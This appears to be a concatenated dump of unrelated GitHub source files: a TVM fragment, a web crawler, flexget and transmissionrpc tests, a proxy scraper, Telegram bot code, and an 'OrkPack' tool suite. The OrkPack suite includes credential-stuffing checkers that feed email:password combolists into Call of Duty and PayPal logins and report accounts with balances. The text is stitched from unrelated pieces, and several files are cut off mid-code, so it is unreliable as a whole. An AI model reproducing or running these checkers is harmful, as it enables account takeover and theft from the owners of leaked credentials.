"""Legalizes Bitserial Conv2D op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
# Fix different kernel layouts where possible.
if attrs['data_layout'] == 'NHWC':
data, kernel = inputs
if len(kernel.data.shape) == 4:
# HWIO layout is expected for NHWC input.
if attrs['kernel_layout'] == 'HWOI':
# Handle HWOI layout. This is common in TF depthwise conv2d graph.
kernel = relay.transpose(kernel, axes=(0, 1, 3, 2))
elif attrs['kernel_layout'] == 'OIHW':
kernel = relay.transpose(kernel, axes=(2, 3, 1, 0))
## Set new attrs for the tranposed conv.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs['kernel_layout'] = 'HWIO'
conv = relay.nn.bitserial_conv2d(data, kernel, **new_attrs)
return conv
return None
``` |
{
"source": "0x00red/pycrawl",
"score": 3
} |
#### File: 0x00red/pycrawl/main.py
```python
import urllib2
import sys
import os
##functions
def parseQmark(addr): ##removes sql
i = 0
out = ""
try:
while(addr[i] != "?"):
out = out + addr[i]
i = i + 1
except:
return addr
return out
def openLink(address, local, current): ##returns list of addresses
tryflag = 0
out = []
out2 = []
try:
url = urllib2.urlopen(address)
except:
return ""
url = url.read()
url = url.split("\"")
for line in url:
if tryflag == 1:
out.append(line)
tryflag = 0
else:
if line[-7:] == "a href=":
tryflag = 1
continue
for addr in out:
addr = parseQmark(addr)
if addr[0:4] == "http":
out2.append(addr)
continue
elif addr[0] == "/":
out2.append(local + addr)
else:
if current[-1] == "/":
out2.append(current + addr)
else:
out2.append(current + "/" + addr)
return out2
def getRelative(addr): ##gets the server's address
out = ""
i = 0
if addr[0:7] == "http://":
i = 7
if addr[0:8] == "https://":
i = 8
try:
while(addr[i] != "/"):
out = out + addr[i]
i = i + 1
except:
return addr
return out
##main
try:
f = open("config.txt","r")
config = f.read()
config = config.split("\n")
f.close()
ITERATIONS = int(config[0])
except:
print("Config error")
sys.exit(0)
current = raw_input("Web address: ")
if current[0:4] != "http":
current = "http://" + current
queue = [current, ]
oldqueue = queue
completed = []
fyon = raw_input("Would you like to export to a file? y/n: ")
fyon = fyon.lower()
if fyon == "y" or fyon == "yes":
fyon = 1
file = raw_input("Filename: ")
try:
f = open(file, "w")
f.close()
except:
print("Unknown error.")
i = -1
cIT = 0
while(1):
try:
while(1):
while(cIT == ITERATIONS):
cont = raw_input("Continue? ")
cont = cont.lower()
if cont == "yes":
cIT = -1
break
elif cont == "no":
os._exit(0)
else:
continue
cIT = cIT + 1
i = i + 1
addr = queue[i]
current = addr
relative = getRelative(addr)
if addr in completed:
continue
if openLink(addr, relative, current) == "":
continue
queue = queue + openLink(addr, relative, current)
oldqueue = queue
print(addr)
if fyon == 1:
try:
f = open(file, "r")
fcon = f.read()
f.close()
f = open(file, "w")
f.write(fcon + addr + "\n")
f.close()
except:
f = open(file, "w")
f.write(addr + "\n")
f.close()
completed.append(addr)
except:
queue = oldqueue[::-1]
``` |
{
"source": "0x00-x/vulcan",
"score": 3
} |
#### File: vulcan/vulcan/Data.py
```python
class UrlData(object):
'''URL对象类'''
def __init__(self, url, html=None, depth=0):
self.url = url
self.html = html
self.depth = depth
self.params = {}
self.fragments = {}
self.post_data = {}
def __str__(self):
return self.url
def __repr__(self):
return '<Url data: %s>' % (self.url,)
def __hash__(self):
return hash(self.url)
class UrlCache(object):
'''URL缓存类'''
def __init__(self):
self.__url_cache = {}
def __len__(self):
return len(self.__url_cache)
def __contains__(self,url):
return hash(url) in self.__url_cache.keys()
def __iter__(self):
for url in self.__url_cache:
yield url
def insert(self,url):
if isinstance(url,basestring):
url = UrlData(url)
if url not in self.__url_cache:
self.__url_cache.setdefault(hash(url),url)
``` |
{
"source": "0x022b/flexget-plugin-traits",
"score": 2
} |
#### File: flexget-plugin-traits/tests/test_example.py
```python
import pytest
from flexget.utils.qualities import QualityComponent
from typing import Generator
from typing import Tuple
from .utils import load_yaml_file
class QualityComponentMock(QualityComponent):
def __init__(self, type: str, value: int, name: str, regexp: str) -> None:
super().__init__(type, value, name, regexp)
self._raw_regexp = regexp
def __repr__(self) -> str:
return "<{}(value={},name={},regexp={})>".format(
self.type.title(), self.value, self.name, self._raw_regexp
)
def __str__(self) -> str:
return f"{self.name}"
class QualityTestPattern:
def __init__(self, type: str, name: str, pattern: str) -> None:
self.type = type
self.name = name
self.pattern = pattern
def __repr__(self) -> str:
return "<{}(name={},pattern={})>".format(
self.type.title(), self.name, self.pattern
)
def __str__(self) -> str:
return f"{self.pattern}"
def patterns() -> Generator[QualityTestPattern, None, None]:
content = load_yaml_file("tests/configuration.yaml")
for type, quality in content.get("patterns").items():
values = dict(content.get("defaults"))
for name, identifiers in quality.items():
for identifier in identifiers:
values[type] = identifier
for template in content.get("templates"):
if f"{{{type}}}" in template:
p = (
template.replace(".", " ")
.replace("-", "/")
.replace("{{audio}}", values["audio"])
.replace("{{codec}}", values["codec"])
.replace("{{color_range}}", values["color_range"])
.replace("{{resolution}}", values["resolution"])
.replace("{{source}}", values["source"])
)
yield QualityTestPattern(type, name, p.replace("/", " "))
p = p.replace("/", "-")
yield QualityTestPattern(type, name, p.replace(" ", "."))
yield QualityTestPattern(type, name, p.replace(" ", "-"))
def qualities() -> Generator[QualityComponentMock, None, None]:
content = load_yaml_file("examples/traits.yaml")
for type, quality in content["traits"].items():
for name, props in quality.items():
yield QualityComponentMock(
type, props.get("value", 0), name, props.get("regexp", name)
)
def quality_test_params() -> Generator[
Tuple[QualityComponentMock, QualityTestPattern], None, None
]:
for quality in qualities():
for pattern in patterns():
if quality.type == pattern.type:
yield (quality, pattern)
@pytest.mark.parametrize("quality, pattern", quality_test_params(), ids=str)
def test_quality(quality, pattern) -> None:
match = quality.regexp.search(pattern.pattern)
if quality.name == pattern.name:
assert match, f"'{quality}' should match '{pattern}'"
else:
assert not match, f"'{quality}' should not match '{pattern}'"
```
#### File: flexget-plugin-traits/tests/test_plugin.py
```python
import pytest
from flexget.utils import qualities
from flexget.utils.qualities import QualityComponent
from flexget.utils.qualities import Requirements
from jsonschema import Draft4Validator as validator
from typing import Any
from typing import Generator
from typing import List
from typing import Tuple
from .test_example import patterns
from .utils import load_yaml_file
from traits.traits import Traits
@pytest.fixture(scope="module")
def config() -> dict[str, Any]:
return load_yaml_file("examples/traits.yaml").get("traits")
def quality_asserts(
quality_components: dict[str, QualityComponent]
) -> Generator[Tuple[int, List[int]], None, None]:
for type, components in quality_components.items():
_qualities = [id(x) for x in getattr(qualities, f"_{type}s", [])]
for _id in [id(x) for x in components]:
yield (_id, _qualities)
@pytest.fixture(scope="module")
def task() -> Traits:
return Traits()
def test_on_task_start(task, config) -> None:
task.on_task_start(None, config)
for (original, current) in quality_asserts(task._original_qualities):
assert original not in current
@pytest.mark.parametrize("pattern", patterns(), ids=str)
def test_requirements_allows(pattern) -> None:
assert Requirements(pattern.name).allows(str(pattern))
def test_on_task_exit(task, config) -> None:
task.on_task_exit(None, config)
for (original, current) in quality_asserts(task._original_qualities):
assert original in current
def test_schema_definition(task, config) -> None:
validator.check_schema(task.schema)
validator(task.schema).validate(config)
``` |
{
"source": "0x022b/transmissionrpc",
"score": 3
} |
#### File: transmissionrpc/test/torrent.py
```python
import time
import datetime
import unittest
import transmissionrpc
import transmissionrpc.constants
import transmissionrpc.utils
from transmissionrpc.torrent import Torrent
class torrent(unittest.TestCase):
def assertPropertyException(self, exception, object, property):
try:
getattr(object, property)
except exception:
pass
else:
self.fail()
def testConstruction(self):
self.assertRaises(ValueError, Torrent, None, {})
Torrent(None, {"id": 42})
def testAttributes(self):
torrent = Torrent(None, {"id": 42})
self.assertTrue(hasattr(torrent, "id"))
self.assertEqual(torrent.id, 42)
self.assertPropertyException(KeyError, torrent, "status")
self.assertPropertyException(KeyError, torrent, "progress")
self.assertPropertyException(KeyError, torrent, "ratio")
self.assertPropertyException(KeyError, torrent, "eta")
self.assertPropertyException(KeyError, torrent, "date_active")
self.assertPropertyException(KeyError, torrent, "date_added")
self.assertPropertyException(KeyError, torrent, "date_started")
self.assertPropertyException(KeyError, torrent, "date_done")
self.assertRaises(KeyError, torrent.format_eta)
self.assertEqual(torrent.files(), {})
data = {
"id": 1,
"status": 4,
"sizeWhenDone": 1000,
"leftUntilDone": 500,
"uploadedEver": 1000,
"downloadedEver": 2000,
"uploadRatio": 0.5,
"eta": 3600,
"activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)),
"addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)),
"startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)),
"doneDate": time.mktime((2008, 12, 11, 10, 0, 15, 0, 0, -1)),
}
torrent = Torrent(None, data)
self.assertEqual(torrent.id, 1)
self.assertEqual(torrent.leftUntilDone, 500)
self.assertEqual(torrent.status, "downloading")
self.assertEqual(torrent.progress, 50.0)
self.assertEqual(torrent.ratio, 0.5)
self.assertEqual(torrent.eta, datetime.timedelta(seconds=3600))
self.assertEqual(
torrent.date_active, datetime.datetime(2008, 12, 11, 11, 15, 30)
)
self.assertEqual(torrent.date_added, datetime.datetime(2008, 12, 11, 8, 5, 10))
self.assertEqual(
torrent.date_started, datetime.datetime(2008, 12, 11, 9, 10, 5)
)
self.assertEqual(torrent.date_done, datetime.datetime(2008, 12, 11, 10, 0, 15))
self.assertEqual(
torrent.format_eta(), transmissionrpc.utils.format_timedelta(torrent.eta)
)
torrent = Torrent(None, {"id": 42, "eta": -1})
self.assertPropertyException(ValueError, torrent, "eta")
data = {
"id": 1,
"status": 4,
"sizeWhenDone": 1000,
"leftUntilDone": 500,
"uploadedEver": 1000,
"downloadedEver": 2000,
"uploadRatio": 0.5,
"eta": 3600,
"activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)),
"addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)),
"startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)),
"doneDate": 0,
}
torrent = Torrent(None, data)
self.assertEqual(torrent.date_done, None)
def testUnicode(self):
torrent = Torrent(None, {"id": 42, "name": "あみ"})
self.assertEqual(torrent.id, 42)
repr(torrent)
str(torrent)
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(torrent)
return suite
``` |
{
"source": "0x06060606/OrkPack-2",
"score": 3
} |
#### File: 0x06060606/OrkPack-2/Main.py
```python
import os, sys
Modules = ["Checkers", "Tools"]
for root, dirs, files in os.walk("./Modules"):
for filename in files:
Modules.append(filename[:-3])
def runModule(ModuleCC):
ModulePath = "./Menus/" + ModuleCC + ".py"
os.system("python3 " + ModulePath)
def MainMenu():
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to _CheckTheDeck_! ")
print(" This tool was supplied by @OrkSec ")
print(" And Revamped by @0x06060606 ")
print(" What Menu would you like to enter? ")
for index, value in enumerate(Modules):
print(" [" + str(index) + "]" , value)
print(" [" + str(len(Modules)) + "]" , "Exit ")
choice = input(" ==> ")
if int(choice) == int(len(Modules)):
exit()
if int(choice) <= len(Modules):
runModule(Modules[int(choice)])
else:
MainMenu()
try:
MainMenu()
except ValueError:
os.system("python3 " + sys.argv[0])
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/CallOfDuty.com.py
```python
import requests, re, time, json
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium import webdriver
from bs4 import BeautifulSoup
options = Options()
options.set_headless(headless=True)
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def login(username, password):
driver = webdriver.Firefox(firefox_options=options)
driver.get("https://profile.callofduty.com/cod/login")
driver.find_element_by_xpath("//input[@id='username']").send_keys(username)
driver.find_element_by_xpath("//input[@id='password']").send_keys(password)
driver.find_element_by_xpath("//button[@id='login-button']").click()
driver.get("https://my.callofduty.com/de/player/combatrecord")
driver.refresh();
elements=driver.find_elements_by_xpath("//div[@class='stats-header']/h2[@class='heading']")
if not elements:
NotExistent=driver.find_elements_by_xpath("//div[@class='no-gameplay-found']/h1")
if not NotExistent:
print(bcolors.FAIL + " [X] " + username + ":" + password + " | Login wrong." + bcolors.ENDC)
# driver.close()
else:
hasGames = False
print(bcolors.WARNING + " [X] " + username + ":" + password + " | Has never played before." + bcolors.ENDC)
driver.close()
else:
hasGames = True
KD = driver.find_elements_by_xpath("/html[@class='wf-opensans-n3-active wf-opensans-n7-active wf-montserrat-n4-active wf-opensanscondensed-n3-active wf-opensanscondensed-n7-active wf-opensans-n4-active wf-active']/body[@class='with-sso-bar desktop sso-logged-in sso-auth-known']/div[@class='page-content-container']/div[@class='page-content parsys']/div[@class='atvi-component atvi-content-tile ignore-id template ']/div[@id='mycod']/div[@id='app']/main[@class='main-content']/div[@class='dashboard-page-new main-content-inner inner-wrapper bo4']/section[@class='weekly-stats item']/div[@class='chart-wrap']/div[@class='weekly-stats__inner']/div[@class='StatProgressCircle bo4']/div[@class='StatProgressCircle__stats']/span[@class='value']").get_attribute('value')
print(bcolors.OKGREEN + " [O] " + username + ":" + password + " | Has a KD Ratio of " + KD + bcolors.ENDC)
element = elements[0]
driver.close()
def storeArray(combolistin):
with open(combolistin.replace(" ", ""), 'r') as myfile:
for line in myfile:
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
login(email, password)
def askForCombo():
print(" Please drag and drop a email:password combolist. ")
combolistFullPath = input(" ==> ")
storeArray(combolistFullPath)
try:
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
askForCombo()
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/Freebitco.in.py
```python
import requests, webbrowser, os, sys, time, inspect, json, re
url = "https://home.nest.com/session"
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def welcome():
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
importCombolist()
def importCombolist():
print(" Please drag and drop a combolist here. ")
combolistPath = input(' ==> ')
with open(combolistPath.replace(" ", ""), 'r') as myfile:
for line in myfile:
payload = 0
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
payload = {'email': email, 'password': password}
try:
welcome()
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/Paypal.com.py
```python
import requests, re, time, os, sys, json, time
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium import webdriver
from bs4 import BeautifulSoup
import speech_recognition as sr
options = Options()
options.set_headless(headless=False)
CURSOR_UP_ONE = '\x1b[0A'
ERASE_LINE = '\x1b[lol'
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
r = sr.Recognizer()
delay = 10
def countdown(t):
while t:
mins, secs = divmod(t, 60)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
sys.stdout.write("\r Waiting " + timeformat + " Seconds Before the next login... ")
sys.stdout.flush()
time.sleep(1)
t -= 1
sys.stdout.write(CURSOR_UP_ONE)
sys.stdout.write("\n")
sys.stdout.flush()
def login(username, password):
time.sleep(10)
driver = webdriver.Firefox(firefox_options=options)
driver.get("https://www.paypal.com/us/signin")
driver.find_element_by_xpath("//input[@id='email']").send_keys(username)
driver.find_element_by_xpath("//button[@id='btnNext']").click()
time.sleep(5.6543)
driver.find_element_by_xpath("//input[@id='password']").send_keys(password)
driver.find_element_by_xpath("//button[@id='btnLogin']").click()
driver.get("https://www.paypal.com/myaccount/summary/")
elements=driver.find_elements_by_xpath("//span[@class='vx_text-1 cw_tile-currency test_balance-tile-currency']")
if not elements:
print(bcolors.FAIL + " [X] " + username + ":" + password + "\t | No Amount ctealable lol. No Span found " + bcolors.ENDC)
driver.close()
else:
cashValue = driver.find_elements_by_xpath("//span[@class='vx_text-1 cw_tile-currency test_balance-tile-currency']").text
print(bcolors.OKGREEN + " [YAY] " + username + ":" + password + " | Found some cash! Amount we found: (" + cashValue + ") " + bcolors.ENDC)
driver.close()
def storeArray(combolistin):
print(" We will wait "+str(delay)+" Seconds between every check! ")
with open(combolistin.replace(" ", ""), 'r') as myfile:
for line in myfile:
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
login(email, password)
def askForCombo():
print(" Please drag and drop a email:password combolist. ")
combolistFullPath = input(" ==> ")
storeArray(combolistFullPath)
try:
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
askForCombo()
except KeyboardInterrupt:
exit()
``` |
{
"source": "0x06060606/Soteria_Proxy-Scraper",
"score": 2
} |
#### File: 0x06060606/Soteria_Proxy-Scraper/index.py
```python
import json, requests, sys
import socket, urllib3, time
import os, random, threading
from time import time as tom
cnt=(0)
ping=(0)
count=(0)
threads=(0)
working=(0)
loop=(True)
debugg=(False)
not_working=(0)
key=('Test-Key')
types=(['http','https','socks4','socks5'])
headers=({'Content-Type': 'application/json', 'Authorization': '{0}'.format(key)})
def debug(msg):
global debugg
if debugg:
print(" [!] Debug >> "+str(msg))
try:
if sys.argv[1]:
maxThreads=(int(sys.argv[1]))
else:
maxThreads=(10)
except Exception as e:
debug(e)
maxThreads=(10)
with open("errors.dat", "a+") as f:
f.write(str('No_Arg_MaxThreads'))
f.write("\n")
try:
if sys.argv[2]:
perThread=(int(sys.argv[2]))
else:
perThread=(1)
except Exception as e:
debug(e)
perThread=(1)
with open("errors.dat", "a+") as f:
f.write(str('No_Arg_PerThread'))
f.write("\n")
try:
if sys.argv[3]:
if int(sys.argv[3])==1:
debugg=(True)
else:
debugg=(False)
else:
debugg=(False)
except Exception as e:
debug(e)
debugg=(False)
def getProxy(proxType):
debug(proxType)
api_url=('{0}{1}'.format("https://proxy.soteria.cf/", proxType))
response=(requests.get(api_url, headers=headers))
if response.status_code == 200:
proxy=(json.loads(response.content.decode('utf-8')))
debug(proxy)
return proxy
else:
debug(json.loads(response.content.decode('utf-8')))
return None
def check(proxy, proxType, url):
global ping, working, not_working
try:
bef=(tom())
requests.get(url,proxies={''+proxType:proxType+'://'+proxy},timeout=(2,5))
aft=(tom())
ping=(str(aft-bef))
working+=(1)
if timeSinceLastRun < 300:
with open(str(proxType)+".dat", "a+") as f:
f.write(proxy)
debug(proxy)
f.write("\n")
else:
with open(str(proxType)+".dat", "w") as f:
f.write(proxy)
debug(proxy)
f.write("\n")
return "Working!"
except Exception as e:
debug(e)
not_working+=(1)
aft=(tom())
ping=(str(aft-bef))
if ('ConnectionPool' in str(e) or 'BadStatusLine' in str(e)):
pass
else:
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
pass
return "Not Working!"
def cleanDupes(Type):
try:
uniqlines=(set(open(str(Type)+".dat").readlines()))
out=(open(str(Type)+".temp.dat", 'w').writelines(uniqlines))
with open(str(Type)+".temp.dat", "r") as f:
out=(open(str(Type)+".dat", 'w').writelines(f.readlines()))
os.remove(str(Type)+".temp.dat")
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
def run(n):
global cnt, count, perThread, ping
try:
p=(0)
while (p < perThread):
magic=(random.randint(1,4))
if (magic==1):
try:
count+=(1)
http=(getProxy('http'))
print(" [Thread-"+str(n)+"] HTTP = "+http[0]+":"+http[1]+" | "+str(check(http[0]+":"+http[1],'http',"http://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] HTTP = Malformed Proxy Error ")
if (magic==2):
try:
count+=(1)
https=(getProxy('https'))
print(" [Thread-"+str(n)+"] HTTPS = "+https[0]+":"+https[1]+" | "+str(check(https[0]+":"+https[1],'https',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] HTTPS = Malformed Proxy Error ")
if (magic==3):
try:
count+=(1)
socks4=(getProxy('socks4'))
print(" [Thread-"+str(n)+"] Socks4 = "+socks4[0]+":"+socks4[1]+" | "+str(check(socks4[0]+":"+socks4[1],'socks4',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] Socks4 = Malformed Proxy Error ")
if (magic==4):
try:
count+=(1)
socks5=(getProxy('socks5'))
print(" [Thread-"+str(n)+"] Socks5 = "+socks5[0]+":"+socks5[1]+" | "+str(check(socks5[0]+":"+socks5[1],'socks5',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] Socks5 = Malformed Proxy Error ")
p+=(1)
else:
debug('Thread '+str(n)+' Done!')
cnt+=(1)
return
except KeyboardInterrupt:
return
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
def finish():
global cnt, working, loop, not_working, befTime, count, types
try:
while (loop):
while (cnt == maxThreads):
for typ in types:
cleanDupes(typ)
with open("time.dat", "w") as f:
f.write(str(tom()))
if (count==not_working+working):
aftTime=(tom())
print(" \r\n")
print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
cnt+=(1)
loop=(False)
else:
aftTime=(tom())
print(" \r\n")
print(" [!] Minimal Error Found in Memory! {"+str(count)+":"+str(cnt)+"} ")
print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
cnt+=(1)
loop=(False)
return
else:
pass
except KeyboardInterrupt:
return
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
if __name__ == "__main__":
try:
os.system('cls' if os.name=='nt' else 'clear')
print("""\r\n\
____ _ _
/ ___| ___ | |_ ___ _ __(_) __ _
\___ \ / _ \| __/ _ \ '__| |/ _` |
___) | (_) | || __/ | | | (_| |
|____/ \___/ \__\___|_| |_|\__,_|""")
print("\n\r [2.0] \r\n ")
with open("time.dat", "r") as f:
timeSinceLastRun=(int(tom())-int(float(f.read())))
debug(timeSinceLastRun)
print(" [#] Starting Proxy API Scraping... (ctrl+c to stop) ")
print(" \r\n")
while (threads < maxThreads):
befTime=(tom())
threading.Thread(target=run, args=(threads,)).start()
debug(threads)
threads+=(1)
else:
threading.Thread(target=finish).start()
exit
except KeyboardInterrupt:
loop=(False)
print(" \r\n")
print(" [#] Force Stopped Proxy API Scraping! ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
exit
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
``` |
{
"source": "0x09AL/appcompatprocessor",
"score": 2
} |
#### File: appcompatprocessor/Ingest/amcache_raw_hive.py
```python
import settings
import logging
import struct
from ingest import Ingest
from appAux import loadFile
import pyregf
from AmCacheParser import _processAmCacheFile_StringIO
import settings
import ntpath
from amcache_miracquisition import Amcache_miracquisition
logger = logging.getLogger(__name__)
# Module to ingest AmCache data
# File extension must be '.hve'
# Hostname = File name
# Note: Exactly the same as amcache_miracquisition with a different file_name_filter
class Amcache_Raw_hive(Ingest):
ingest_type = "amcache_raw_hive"
file_name_filter = "(?:.*)(?:\/|\\\)(.*)\.hve$"
def __init__(self):
super(Amcache_Raw_hive, self).__init__()
def getHostName(self, file_name_fullpath):
if not settings.__PYREGF__:
logger.warning("AmCache processing disabled (missing pyregf) skipping file: %s" % file_name_fullpath)
else: return super(Amcache_Raw_hive, self).getHostName(file_name_fullpath)
def checkMagic(self, file_name_fullpath):
magic_ok = False
# Quick and dirty check
file_object = loadFile(file_name_fullpath)
tmp = struct.unpack( '4s' , file_object.read(4) )
if tmp[0] == "regf":
# Perform a deeper check using pyregf
regf_file = pyregf.file()
regf_file.open_file_object(file_object, "r")
magic_key = regf_file.get_key_by_path(r'Root\File')
regf_file.close()
del regf_file
if magic_key is not None:
magic_ok = True
file_object.close()
del file_object
return magic_ok
def calculateID(self, file_name_fullpath):
instanceID = None
file_object = loadFile(file_name_fullpath)
regf_file = pyregf.file()
regf_file.open_file_object(file_object, "r")
tmp = regf_file.get_key_by_path(r'Root\File')
if regf_file.get_key_by_path(r'Root\File') == None:
logger.warning("Not an AmCache hive! [%s]" % file_name_fullpath)
else:
instanceID = regf_file.root_key.last_written_time
# Need to close these or the memory will never get freed:
regf_file.close()
del regf_file
file_object.close()
del file_object
return instanceID
def processFile(self, file_fullpath, hostID, instanceID, rowsData):
rowNumber = 0
file_object = loadFile(file_fullpath)
rows = _processAmCacheFile_StringIO(file_object)
file_object.close()
for r in rows:
namedrow = settings.EntriesFields(HostID = hostID, EntryType = settings.__AMCACHE__, RowNumber = rowNumber,
FilePath = (None if r.path == None else ntpath.dirname(r.path)), FileName = (None if r.path == None else ntpath.basename(r.path)),
Size = r.size, ExecFlag = 'True', SHA1 = (None if r.sha1 == None else r.sha1[4:]),
FileDescription = r.file_description, FirstRun = r.first_run, Created = r.created_timestamp, Modified1 = r.modified_timestamp,
Modified2 = r.modified_timestamp2, LinkerTS = r.linker_timestamp, Product = r.product, Company = r.company,
PE_sizeofimage = r.pe_sizeofimage, Version_number = r.version_number, Version = r.version, Language = r.language,
Header_hash = r.header_hash, PE_checksum = r.pe_checksum, SwitchBackContext = r.switchbackcontext, InstanceID = instanceID)
rowsData.append(namedrow)
rowNumber += 1
``` |
{
"source": "0x0bloodyknight/jdan734-bot",
"score": 3
} |
#### File: config/lib/driver.py
```python
from aiovk.drivers import BaseDriver
import aiohttp
class HttpDriver(BaseDriver):
def __init__(self, timeout=10, loop=None, session=None):
super().__init__(timeout, loop)
async def post_json(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.post(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.json()
async def get_bin(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.get(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.read()
async def get_text(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.get(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.text(), response.real_url
async def post_text(self, url, data, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.post(url, data=data, timeout=timeout or self.timeout) as response:
return response.status, await response.text(), response.real_url
async def close(self):
await self.session.close()
```
#### File: config/lib/filters.py
```python
import asyncio
import logging
from .text import code
from ..bot import bot
class ResendLogs(logging.Filter):
def filter(self, record):
loop = asyncio.get_event_loop()
loop.create_task(self.send_to_tg(record))
return True
async def send_to_tg(self, record):
await bot.send_message(-1001435542296, code(record.msg),
parse_mode="HTML")
class NoRunningJobFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("Running job Every")
```
#### File: config/lib/middleware.py
```python
import os
import yaml
import i18n
from .text import fixHTML
from aiogram.contrib.middlewares.i18n import I18nMiddleware as I18nMiddlewareBase
class I18nMiddleware(I18nMiddlewareBase):
def t(self, singular, plural=None, n=1, locale=None,
enable_patch=False, prepare_kwargs=False, **kwargs):
self.i18n = i18n
self.i18n.load_path.append(self.path)
res = self.gettext(singular, plural, n, locale)
lang = self.ctx_locale.get()
lang = self.default if lang is None else lang
lang = "uk" if lang == "ua" else lang
self.i18n.set("locale", lang)
self.i18n.set("fallback", self.default)
if prepare_kwargs:
for arg in kwargs:
kwargs[arg] = fixHTML(kwargs[arg])
try:
if enable_patch:
raise TypeError
return self.i18n.t(res, **kwargs)
except TypeError:
path = f"{self.path}/{res.split('.')[0]}.{{lang}}.yml"
if not os.path.exists(path.format(lang=lang)):
lang = self.default
with open(path.format(lang=lang),
encoding="UTF-8") as f:
locale = yaml.safe_load(f.read())
translate = locale.get(lang).get(res.split(".")[1])
if isinstance(translate, str):
return translate
return [_.format(**kwargs) if isinstance(_, list) else _
for _ in translate]
```
#### File: bot/dev/crypto.py
```python
import hashlib
from random import choice
from ..config import dp, _
from ..lib import handlers
from ..lib.text import code
@dp.message_handler(commands=["sha256"])
@handlers.get_text
async def sha256(message, text):
text = bytearray(text.encode("utf-8"))
crypt = hashlib.sha256(text).hexdigest()
await message.reply(crypt)
@dp.message_handler(commands=["generate_password", "password"])
@handlers.parse_arguments(2)
async def password(message, options):
try:
password_len = int(options[1])
except ValueError:
await message.reply(_("error.pass_len_required"))
return
if password_len > 4096:
await message.reply(_("errors.message_len"),
parse_mode="Markdown")
return
elif password_len < 6:
await message.reply(_("errors.pass_crypt_is_low"),
parse_mode="Markdown")
return
password = ""
symbols = []
symbols.extend(list("abcdefghijklmnopqrstuvwxyz"))
symbols.extend(list("abcdefghijklmnopqrstuvwxyz".upper()))
symbols.extend(list('~!@#$%^&*()_+-=`[]\\}{|;\':"<>,./?'))
symbols.extend(list("0123456789"))
for __ in range(0, password_len):
password += choice(symbols)
await message.reply(code(password), parse_mode="HTML")
```
#### File: bot/dev/text.py
```python
from ..config import dp
from ..lib import handlers
@dp.message_handler(commands=["title"])
@handlers.get_text
async def title(message, text):
await message.reply(text.title())
@dp.message_handler(commands=["upper"])
@handlers.get_text
async def upper(message, text):
await message.reply(text.upper())
@dp.message_handler(commands=["lower"])
@handlers.get_text
